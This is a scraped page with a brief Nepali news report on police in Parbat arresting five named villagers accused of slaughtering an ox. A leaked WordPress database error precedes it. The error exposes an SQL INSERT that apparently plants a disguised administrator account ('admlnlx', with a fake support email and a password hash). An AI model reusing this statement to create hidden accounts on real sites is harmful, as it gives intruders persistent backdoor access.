WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwPxqK.7c0R9NDgXLWsP3R3fXiBe0C1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 10:10:10', '', 'admlnlx', 'admlnlx')
पर्वत, माघ २७ –
गोरु काटेर खाएको आरोप पर्वतको धाइरिङ–८ बाट प्रहरीले पाँच जनालाई पक्राउ गरेको छ । गोरु काटेर खाएको सूचनाका आधारमा प्रहरीले बुधबार उनीहरुलाई पक्राउ गरेको हो ।
प्रहरीले धाइरिङ–८ का झिल्के दर्जी, छवि परियार, सन्तु दर्जी, आइते दर्जी र नरबहादुर दमाई लाई नियन्त्रणमा लिएको हो । उनीहरुले मंगलबार गोरुको बध गरेको आरोप रहेको प्रहरी नायव उपरीक्षक शेखर खनालले बताउनुभयो ।जिल्ला प्रहरी कार्यालय पर्वतले आरोपित पाँचै जनालाई पर्वत जिल्ला अदालतमा गौबध कसुर ऐन अनुसार मुद्दा चलाउने तयारी गरेको छ ।